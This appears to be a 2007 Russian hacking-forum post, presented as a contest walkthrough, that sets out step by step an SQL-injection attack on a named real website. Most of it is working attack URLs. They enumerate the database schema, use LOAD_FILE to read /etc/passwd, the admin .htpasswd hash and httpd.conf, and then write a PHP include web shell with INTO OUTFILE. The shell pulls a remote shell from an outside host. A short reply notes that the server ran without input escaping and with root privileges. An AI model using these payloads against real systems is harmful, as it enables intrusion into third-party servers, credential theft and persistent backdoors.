Конкурс d0p3_sh0w & sato [прохождение]

Тема в разделе "Статьи", создана пользователем Koller, 13 сен 2007.

  1. Koller
    Koller Guest
    Выкладываю по наставлению рыжего...потому как данная "статья" потерялась...
    Не плохой конкрус aka задание...понравилось...

    Ну начнем с того, что сперва находим ту самую "скуль", о котором говорилось в описании конкурса
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,2,3,4,5,6/*
    Проверяем по-умолчанию таблицы: mysql.user и mysql.password и каково было моё удивление, когда обнаружилось, что у меня хватает прав на чтение mysql.user

    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,user,3,4,5,6+from+mysql.user/*
    Пароль у root'а пустой...попытался удаленно подключиться к их БД, естественно не вышло :(
    Смотрим дальше....

    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,database(),3,4,5,6+from+mysql.user/*
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,version(),3,4,5,6+from+mysql.user/*
    Название базы - acanaru
    Версия: 5.0.33, что очень и очень меня порадовало...
    Спросите почему?...а всё просто...
    В mysql >=5 версии есть специальная таблица INFORMATION_SCHEMA, благодаря который можно узнать названия всех существующих таблиц и колонок в БД...
    Так чего же мы ждем...начинаем узнавать...
    Сперва таблицы:
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,TABLE_NAME,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+LIMIT+1,1--
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,TABLE_NAME,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+LIMIT+2,1--
    И так далее...
    Видим, что в БД след. таблицы:
    Из всех таблиц заинтересовал только user...
    Узнаем колонки в ней...
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,COLUMN_NAME,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'+LIMIT+1,1--
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,COLUMN_NAME,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'+LIMIT+2,1--
    Получаем: User, Password, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv.......
    Но вывести информацию из этой таблицы почему-то не вышло...посему я бросил затею с БД, и взялся за другую "разработку"...

    Админку долго искать не пришлось - _http://www.acana.ru/admin/
    Вернемся к скули...
    Проверим привилегии типа FILE...
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,LOAD_FILE('/etc/passwd'),3,4,5,6/*
    Все просто отлично! )
    Чтобы залить шелл, имея привилегии типа FILE (что встречается очень и очень редко), нужно узнать полный путь к сайту...
    В надежде найти ошибку на сайте, которая смогла бы вывести тот самый путь, я начал везде и всюду тыкать спец. символы в различные параметры скриптов...
    Но к сожалению ничего не вышло...

    Ах да...забыл...перед этим получил хеш в DES админа:
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,LOAD_FILE('/home/www/htdocs/admin/.htpasswd'),3,4,5,6/*
    Так и не сбрутился...

    Мне нужно было узнать полный путь к сайту...==> нужно было бы найти httpd.conf в котором хранится нужная мне информация...
    Долго искать, опять-таки, не пришлось, потому как находится он в "стандартном" месте:
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,LOAD_FILE('/usr/local/apache/conf/httpd.conf'),3,4,5,6/*
    Узнаем мыло админа, логи доступа и нужный нам полный путь:
    Меня он немного смутил, посему так долго заливал шелл...

    А дальше всё просто...
    Код:
    http://www.acana.ru/champion.php?razdel_id=-8+union+select+1,'<?%20include($_GET["inc"]);%20?>',3,4,5,6+INTO+OUTFILE+'/usr/local/apache/htdocs/999.php'/*
    Затем инклудим _http://acana.ru/999.php?inc=http://123.ru/shell.txt
    Дальше заливаем полноценный шелл непосредственно на сам сервер, если в этом есть необходимость...

    Вроде всё понятно и доступно рассказал...
    Всех благ...

    P.s. Информация выложена для учебных целей, а не для использовании ее на практики...
     
    13 сен 2007
  2. Constantine
    Constantine Guest
    Очень легко, магик_квотс офф и права рутовые;)
    Сейчас редко где такое встретишь
     
    13 сен 2007
Загрузка...